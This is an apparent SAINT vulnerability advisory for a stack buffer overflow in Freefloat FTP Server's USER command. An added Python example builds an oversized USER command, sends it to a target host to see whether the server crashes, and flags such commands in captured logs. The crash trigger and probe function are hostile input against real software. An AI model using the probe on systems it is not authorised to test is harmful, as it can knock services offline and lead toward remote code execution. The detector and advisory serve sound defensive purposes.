Freefloat FTP Server USER Command Buffer Overflow

2011-01-26T00:00:00
ID SAINT:CDD8B48E1A4694EBE002F37D3D232CDF
Type saint
Reporter SAINT Corporation
Modified 2011-01-26T00:00:00

Description

Added: 01/26/2011
BID: 45181
OSVDB: 69621

Background

Freefloat is a line of software developed for handheld terminals. Freefloat FTP Server is a free FTP server for various versions of Windows, including Windows CE/Pocket PC.

Problem

Freefloat FTP Server is vulnerable to a stack-based buffer overflow when it receives an overly long command. A remote attacker can trigger the overflow by sending the FTP server a **USER** command with an overly long username parameter. Because **USER** is the first command of the FTP login exchange, no valid credentials are needed to reach the vulnerable code.
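The following Python is an added example, not code from the advisory or from SAINT. It builds the oversized **USER** command described above, provides a lab probe that sends it and reports whether the server stops answering, and includes a simple detector that flags such commands in captured FTP command lines. The trigger length (1000 bytes), the detection threshold (128 bytes) and the sample command lines are all assumptions constructed for illustration; the advisory does not state the exact length needed to crash the server.

```python
import socket

# Constructed sample of FTP command lines, as a sensor might log them.
# These are made up for this example and are not from the advisory.
SAMPLE_COMMANDS = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"USER " + b"A" * 1000 + b"\r\n",   # the oversized username trigger
    b"LIST\r\n",
]

# Assumed threshold: real usernames are short, so a USER argument of
# hundreds of bytes is a reasonable indicator of the overflow attempt.
MAX_USER_ARG = 128


def build_user_trigger(length=1000):
    """Return a USER command whose username is `length` bytes long.

    The length is an assumption; the advisory only says "overly long".
    """
    return b"USER " + b"A" * length + b"\r\n"


def user_arg_length(line):
    """Return the length of the argument if `line` is a USER command, else None."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    if verb.upper() != b"USER":
        return None
    return len(arg)


def flag_oversized_user_commands(lines, max_len=MAX_USER_ARG):
    """Return the indices of lines whose USER argument exceeds `max_len`."""
    hits = []
    for i, line in enumerate(lines):
        n = user_arg_length(line)
        if n is not None and n > max_len:
            hits.append(i)
    return hits


def probe(host, port=21, length=1000, timeout=5.0):
    """Send the long USER command to a lab instance and observe the reaction.

    Returns (banner, reply). A reply of b"" means the server closed the
    connection or went silent, which is what a crashed service looks like.
    Only use against systems you are authorised to test.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)
        s.sendall(build_user_trigger(length))
        try:
            reply = s.recv(1024)
        except (socket.timeout, ConnectionResetError):
            reply = b""
    return banner, reply


if __name__ == "__main__":
    # Offline run: show which constructed command lines the detector flags.
    print("flagged line indices:", flag_oversized_user_commands(SAMPLE_COMMANDS))
```

The detector keys on the command verb rather than on raw line length so that a long but legitimate argument to another command (a long path to RETR, for instance) is not misreported; if the monitored service is known to reject any username beyond a fixed size, lower the threshold to that size.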

Resolution

Use a firewall to restrict access to the FTP port to trusted computers, install an update from the vendor when one becomes available, or choose another FTP server.

References

<http://secunia.com/advisories/42465/>

Limitations

Exploit works on Freefloat FTP Server 1.0 on Microsoft Windows Server 2003 SP2 with KB956802 and KB956572.

Platforms

Windows